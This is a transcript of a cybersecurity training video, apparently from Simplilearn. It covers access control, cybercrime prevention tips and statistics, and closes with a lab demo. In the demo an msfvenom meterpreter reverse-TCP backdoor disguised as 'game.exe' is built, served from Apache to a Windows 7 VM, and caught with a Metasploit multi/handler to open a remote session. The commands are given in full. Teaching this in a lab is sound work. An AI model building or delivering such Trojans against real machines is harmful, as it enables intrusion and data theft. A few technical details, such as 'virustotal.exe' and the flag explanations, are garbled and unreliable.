take an example of OneDrive again. When we are talking about authorization, we say, hey, come to the OneDrive page, now log in. When you say log in, the first thing is you need to identify yourself, right? You cannot just type in a password and then the OneDrive scans their databases, sees which password matches which account and throws that account in front of you. It's not going to happen that way. So there are two factors that come into the picture here. First is that you identify which account you're talking about, which normally you identify by using either a username or an email address or an account ID, for example, your bank's. Then you're prompted for a password. You type in the correct password that is associated with the username that you have given in, only then you are able to sign in. So it's a combination of both these factors, the username and the password, and it should match each other in the database that has been stored. Thus, the authentication happens. So you have now authenticated yourself, you have identified, you've proven that you're who you are, and now the system then goes in its database and sees what you're authorized to access, what access controls have been implemented for you to access or not access certain data. Now, this is where ACLs or access control lists come into the picture. So the moment you access something, it will check whether you're authorized to access it. If yes, you're allowed. If no, you're denied. You're given an error saying you need to contact your administrator if you want to access this, because currently your level of authorization does not grant you access to this particular file type. Now, if I am allowed access and if I access that data, then there is where the trustworthiness of that data comes into the picture, the integrity of that data. So this data is being monitored either by a data loss prevention system or a integrity monitoring system like Tripwire, where they constantly take on hashes of the file and store it in a secondary database. So when the file is modified, the hash value would then be modified, or I would be prevented from modifying it if I don't have that level of authorization. Then comes the availability. We have been taken the example of OneDrive. Has it ever happened that OneDrive was not available over the internet at any point in time? Maybe a couple of times in the past few years, but 99.9999% it's always available. So they ensure that the data center that they have created is redundant in such a way that no matter what happens, the data or or your OneDrive software and the service that they're providing will always be made available to you. So here your business continuity planning, disaster recovery planning, change management, service management, and all those would come into the picture, where you're going to create a robust plan of how these things are going to work together and make that infrastructure available at all point in time. Right, let's move on to tackling cybercrime. So what do we mean by cybercrime? Now again, if you remember a few slides back or a few topics back, we talked about information security and we talked about cybersecurity, and we talked about the difference between both of them. Information security could be about anything normally contained within the organization, the data that the organization has, and us securing those data by introducing the security controls that we talked about. Cybersecurity would be something that is on the internet or on the web. So any web application that I have deployed on the internet, any databases that I have, that would talk about cybersecurity. So if your Facebook account gets hacked or your OneDrive gets hacked, that's where cybersecurity comes into the picture. But if your physical computer gets hacked because your password got cracked by a physical attack, that's where your information security is. So some of the basic ways of preventing cyber attacks on us. Use unique and strong passwords. We've just discussed the complexity of the passwords. We want to keep them random. They should not be guessable. They should not be based on dictionary words, and they should be randomized in such a way that they cannot be predicted or guessed. The length of the password should be very good. Should at least the bare minimum should be 8 characters. Even that is not suggested in today's world. It has to be at least 12 to 16 characters. An operating system, I think, in today's world will support up to 24 or 26 characters. If you go into encryption softwares, they support up to 60 odd characters of passwords. So you want to keep those unique. You want to recycle those passwords on a regular basis. You do not want to reuse old passwords again and again. Avoid public Wi-Fi. That's a must. We always look for free Wi-Fi. We go to coffee shops because they advertise free Wi-Fi. That's nowadays a unique selling point for coffee shops and establishments. And we go there, we connect to the Wi-Fi because we get free internet and we get to surf whatever we want. The problem is we have no idea who else is connected to that Wi-Fi and what kind of attacks they are creating. We would discuss Wi-Fi attacks later on in one of the later videos where I can demonstrate how these attacks work. But for now, just remember that public Wi-Fis are very risky. And if your security is not up to the mark, you might just end up getting hacked like nobody's business. Ignore and delete mails from unknown senders. Phishing attacks, very common attacks in today's world. You get an email saying you've won a lottery or you've been chosen for something, or please click here to download your free software. and something like that. And those emails are plenty nowadays. I received an email yesterday where there was a Nigerian prince who had died, and he had left around $500 million behind. And there was this accountant who wanted to smuggle that money out. And it was a huge email giving me all the details. And out of 7 billion people on this planet, they identified my email address. And they wanted to share half the money with me so that they can masquerade the money and avoid paying taxes, inheritance taxes and whatnot. It was a ridiculous scheme. I mean, being chosen out of 7 billion, 1 out of 7 billion, our luck can't be that good, can it? So you have to be wary about these attacks. Always ask the question, if you won a lottery, did you purchase the ticket? No. So there's never a free lunch, right? So always keep on questioning the things that you've been getting. I'm not saying ignore them, because some of them may actually come true. There's always that 1% hope, but always investigate those things to see whether they are spam, if there is a fraud going on. And if yes, you yourself can communicate with the law enforcement agency and try to figure out who is responsible for that fraud. Make use of antivirus software and always keep it updated. Again, let's not go for the free antivirus softwares, because they may be good at detecting infections, but when they come for disinfecting those files, then that's where they ask for money. And that's when you're going to run around and say, okay, let me see which is a very good antivirus to disinfect this kind of a infection. So there are a lot of antiviruses out there, I know that, and it's very confusing which is the best one today. Now, the problem is whichever is the best one in the market may not be the best one for the operating system that you're using. For example, there would be a good antivirus for Windows 7, but the same antivirus installed on Windows 8 or Windows 10 wouldn't be that effective. So always do an investigation. The best way to look at antiviruses and identifying which antivirus suits you is to investigate that antivirus and see the detection rate of that antivirus. See how often does it detect the infections that you're looking at. What you can do is you can head on to a website called virustotal.com. That's virustotal.com. It's a Google owned website. They have around 60 to 70 odd scanners on that website. Most of the known antivirus scanners are there. Try to see if you can get hold of an infected file. Be very careful. You don't want to get infected yourself, or your computer. You can upload it to that particular website and analyze that file and see which antivirus detects those kind of viruses. A few files, a few infections over here and there, and you will come to know which antiviruses would work for you. Use multi-factor authentication or two-step processes for authentication. Just don't rely on a username and password. Register devices, get OTPs either on your email or on your devices. That gives you an added layer of security. If your password gets compromised, that's still okay, because now the hacker will need to simulate your phone as well. So that's added headaches, and it may just not be worth it. There are so many other people who don't use these kind of techniques who can be hacked much easily than people who have an added layer of security introduced. And be very careful when you're downloading apps. Now, when we say applications, on your mobile phones as well as in your computers. On your mobile phone, you still have a certain level of security where you can go to the Apple Marketplace or whatever it is called, the Google Marketplace or whatever it is called, and they do have some level of control. But when you talk about Windows operating systems and you're going on to the open internet to look for different kinds of softwares, you have no idea whether the website that you're on is trustworthy or is hosted by a hacker with a malware on that particular file that you're downloading, especially if you're downloading a pirated program. Never download a pirated program. So be very careful when you're downloading apps. When you're downloading an executable file, you can upload it to virustotal.exe, scan it to see if there are any viruses or malwares within it. The website also helps you analyze URLs to see if the URL itself may have any malicious attacks within them, embedded scripts or redirector scripts or things like that. So you can use that website to scan the apps that you're downloading and see if there is anything malicious about those apps. Moving on to cybercrime statistics. Now this is going to be interesting. Let's talk about how these things and the percentile of these things in today's world. By 2020, we would have generated 300 billion passwords. Now, the human population on this planet is 7 billion. Imagine 7 billion having 300 billion passwords. And I think half the population wouldn't have access to computers or the internet either. So imagine the number of passwords that we have. And that's what makes us use easy passwords, makes us repeat those passwords, and we use a single password for multiple accounts, right? Because there are just so many passwords that we have to remember. But that's the way it is. And if we want to keep ourselves secure, we are responsible for it. So please be very careful with those passwords. 24,000 malicious mobile apps blocked daily. In fact, the latest example that I can give you, I use an Android phone, and there's an application that I've always used called Cam Scanner. And recently, just 3 days back, my mobile phone started telling me that it is a malicious app, right? I've been using it for years now, probably 3 or 4 years, maybe more. What is the software? You can click pictures of a document, it will automatically convert it, it will beautify it, if that's a word, convert it into a PDF, and I can then send it as an attachment via email. A very handy app for me, or was an handy app for me. It worked beautifully, but 3 days back, suddenly the Android operating system and my antivirus on my Android phone started reporting it as a malicious software. So I went online and I checked into it, and it seemed that over a period of time, the developers changed their vision of that software, made it spyware, and then there was a dropper involved within that application which would then download a malware from a third-party server, install it, and start spying on you and start showing you malicious advertisements, right? So this was an existing app which was trusted over a period of years, and over a period of time, slowly, they modified it into a spyware. Kaspersky was an organization that detected it in the first place and then pointed it out to Google. Google took it off the Google Play Market, and now there is a variant of it available, but if you look at the reviews, all of them are 1 stars, where they have identified that this is a malware now and it spies on them and it actually compromised some people's data. So that's the latest example. In 2017 or 18, there were 700,000 apps during that year that were identified by Google as malicious apps and were deleted from Google Play. So even if they're published, there will be thousands of people who will download it till the time Google realizes that it is a malware and then deletes it. Till then, you've already been compromised, and there is no way to protect yourself now. So be very careful when you download these applications. In the healthcare sector, ransomware attacks will quadruple. Now, the healthcare sector is a very volatile sector. It contains a lot of private and sensitive information, health information about individuals that can be misused by a lot of organizations, advertisements, pharmaceutical organizations, life insurance people, and whatnot, right? So these become very lucrative targets for hackers, where if they can steal the database and sell it on the black market, they will earn a lot of money. Ransomwares would basically work the other way around. They encrypt the data at the hospital side, and then they will hold the hospital ransom to pay up. Now, you know how hospitals earn nowadays, right? So that's a lot of money that we're looking at. Cybercrime would cost up to $6 trillion in 2021. $6 trillion just for cybercrime. We are not talking about the income from the IT industry. We are talking about how much money we will lose to cybercrime because of the various attacks that would be created. 90% of hackers use encryption. Not only encryption, most of the advanced hackers will try to hide their identity by spoofing their IP addresses, MAC addresses, locations. They will use encryption and cryptography to hide their malicious softwares, to fool the antiviruses, IDSs, IPSs. And it is a very difficult task to even identify a particular malware, analyze it, and then do a root cause analysis and try to figure out who the responsible hacker was. So it's a very intensive task of doing such things, and most of the hackers would go scot-free because it is very difficult to identify them. Now, let's move on to the demo. It's a very interesting demo. We are using Metasploit, which is a penetration testing tool, and we are going to use a demo of using Metasploit. We are going to try to compromise the security of a particular system. Well, let's discuss the demo before we start executing it. So what we have done here is that we have 2 virtual machines on VMware Workstation. One is the Kali Linux machine, and the other is a Windows 7 machine. What we are going to do is we are going to use a penetration testing tool called Metasploit, which is available freely on Kali Linux, and we are going to use a particular payload generator on Metasploit called MSF Venom. And using MSF Venom, we are going to create a backdoor, executable file which will contain a Trojan or a backdoor, and we are going to try to infect that to the Windows machine and see what happens when the victim executes that particular file. Now we are going to keep it at the basic level. We're just going to create the Trojan and then we're going to execute it. In a later lecture or in a later video, we'll see how we can mask that Trojan into a legitimate looking application so that a victim can be fooled by the application that we're going to execute. So let's start with the demo. Alright, so this is the Kali Linux VM and the other machine is a Windows 7 virtual machine. So what we are going to do is, on the Kali Linux machine, we are going to just open up a command prompt, right? It's just a regular command prompt, your regular commands. And what we are going to do is we are going to use the MSF Venom payload generator from Metasploit to create a game.exe file. Now the Trojan will be contained within the game.exe. So the command goes as such: MSF Venom -p for platform. We want it, or rather payload at this point in time, we want the payload to be Windows Metapreter reverse _ TCP L host, and the IP address for the local host. I'll explain the command once I've typed it. Let's just check what our IP address for this machine is, and we have 192.168.71.133, and that's what we are going to type in here: 192.168.71.133, L port 4444-F exe-a x86, and we want that output in root desktop, and we want it as game.exe. So let's go through the command. The MSF Venom is the initiator command. It invokes the payload generator in Metasploit. -p is the payload. We want Windows Metapreter reverse TCP. So what is a reverse TCP? Here, the Metapreter allows us for remote code execution, where we are going to create the payload. We are going to execute the payload at the victim's end, and the payload will then generate a connection back to us being the hacker's machine, and thus the local host, which is the IP address of this machine, which is the hacker's machine that we're using right now, which is 192.168.71.133. That's why we have typed in the local host. And L port is the local port on which port do we want to listen in, or we want the payload to connect to the local host. So what we are doing is, the Metapreter allows us remote code execution. We create the game.exe, we execute it at the victim's end. It is pre-coded to connect to a local host. The IP address is coded over there to a particular port, which in this case is 4444. You can put in any port number you want. Just ensure that the port is going to be free and it is not a regularly used port. Otherwise, you're going to get problems over there. So at this point in time, we're going to keep it as 4444. -F stands for function. We want an executable file. -A stands for the architecture. Here the architecture is 886, which is x86, which is 32-bit, and we are going to export it, and we are going to host it, or we are going to create the file on root desktop, and we are logged in as root, as you can see at the prompt. So when I press enter, I should see a game.exe popping up right about here on my desktop, if the command is correct, which it should be, and that's game.exe. Wait for it to be compiled properly. So there you can see platform Windows for payload, no encoder, payload size 333 bytes, and final size of executable file is 73,802 bytes. So now we have created game.exe. Now we are not going to convert this into, or we are not going to merge this into a malware and things like that. We are going to keep it simple. So to keep it simple, what I'm going to do is, as a hacker, I'm going to host this on a server, which is going to be on this same machine, right? So when we say we want to host an Apache server, the server is hosted in a directory called /var/www. So let's go there. Present working directory. We can see that we are in root cd var www, and there we are cd html, and that is where our web servers would be. So what we are going to do is we are going to create a directory mkdir shared, right, to an ls, and you can see the shared folder right here. ls-al will give you the list and the attributes, and we can see these attributes. We want to change these attributes, so we are going to use a chmod recursive command, give the permissions as 755 to the folder shared. Since we are in the same directory, we do not need to give the path for shared. Let's just verify it, and you can see the permissions being changed. And now what we are going to do is we are going to change the ownership from root to www-data for the web hosting. So chown for change ownership, recursive www-data : www-data to shared. Alright, let's check if that's been done properly. And you can see that earlier it was root, and now it is www-data, right? And so that's the directory that we have created. Let's go back. What we want to do is we want to copy game.exe into this folder. So cp root desktop game.exe var www html shared and cd shared. Let's see, we have game.exe right there. There it is. And now what we want to do is service apache 2 start. So essentially what we have done is we have created a directory in the HTML folder to host this file, and we have copied it from our desktop into the shared folder. And I'm going to pause here for a minute. Alright, so we have started the service for the Apache 2 server. That means we have started the web server. We have hosted the game.exe on the web server in the shared folder. We have changed the permissions and the ownership for the shared folder. Now we are going to go on to the Windows 7 machine, and we are going to open up the browser and see if the web server is now accessible. So if you remember, the IP address of that machine was 192.168.71.133, and we were in the shared folder. 192.168.71.133 shared, and if this is done properly, we should see the game.exe right here. And once we click on it, it's going to ask us whether we want to save the file. 72.1 KB, we're going to save it, and I'm going to save it on I think it just saved it here. And now before we execute it, we are going to go back into Kali Linux, and we are now going to start the listener. Right, so we have created the exploit, we have created the payload rather, we have hosted it onto a web server, which means that when somebody double clicks on it, the machine is going to try to create a reverse connection to our hacker's machine. But our hacker's machine needs to be configured to handle that incoming connection. So we are going to start off with msf console. Now msf console is the command which starts up Metasploit. Right, so we're just going to take a minute over here. You can see it's Metasploit framework console. It's going to start. It's does take a little bit of a while, and we're just going to wait it out. Let me turn this into full screen. I can see at the bottom left, we are on MSF on the MSF prompt. We are using Metasploit with 1699 exploits. Now this is not the completely updated version. The latest one would have around 1800 exploits, but the one that we want is exists in this version, so we are good to go. So we start off with the configuration of Metasploit to listen in onto that particular connection. So we say use exploit multi-handler. And when we say multi is basically something that affects multiple operating systems. And we're going to use that exploit, and you can see it's now opening up the handler which we need to configure. And here we're going to set the payload that it is going to expect, the payload being Windows meterpreter reverse underscore TCP. And you can see that the payload has been configured. We are going to say show options, and you'll see it is going to ask us options for the payload, which means the local host, the listen address, and the listen port. And you can see we had by default given 4444, which is the default port for this exploit within Metasploit. If you want to change, if you have changed the port when you created game.exe, you need to change the port over here as well. And the commands here, let's say set lhost equals 192.168.71.133. Enter, and I think I did a typo, so there's no equal to, that's it. And you can see now it shows the equal to mark, and we have now set the local host. If we want to set the L port, that's how we do it. We had 4444, and there it is. So if you have changed the port in the game.exe, ensure that you change the port here as well. Show options, and you'll see now the data is populated over here. Lhost, which is the local host, is 192.168.71.133, and L port, the local port, is 4444. We have configured this, and now what we are going to do is we're just going to type in exploit, and now you can see that it has started the reverse TCP handler on 192.168.71.133 on port 4444. So now when the victim, which is Windows 7, executes the file and we say run, at the victim's end, there's nothing that should happen. It's just resolving something, and at the other end, you can see that a meterpreter session has been opened, and it shows us that from the victim's IP, which is 71.129 on port 49493, we are connected to our machine. So that's the connection that has happened. Press enter and you can see it exits the session. Let's just look at the IP address on Windows to confirm that was the same machine that we had, and that's 129. Right there it is. Let's open up this file again and see what happens. And you can see the second session being opened up right here to a PWD, and you can see that we were connected to that particular website, right? So that's what this Trojans are supposed to do, give us a backdoor entry, and we then are able to connect, and we are able to copy data, and we are able to, basically we have a backdoor so we can do anything and everything that we want to do. And that, my dear friends, is the demo for this particular session. Thank you, and I'll see you in the next video.
Hi there, if you like this video, subscribe to the Simplilearn YouTube channel and click here to watch similar videos. To nerd up and get certified, click here.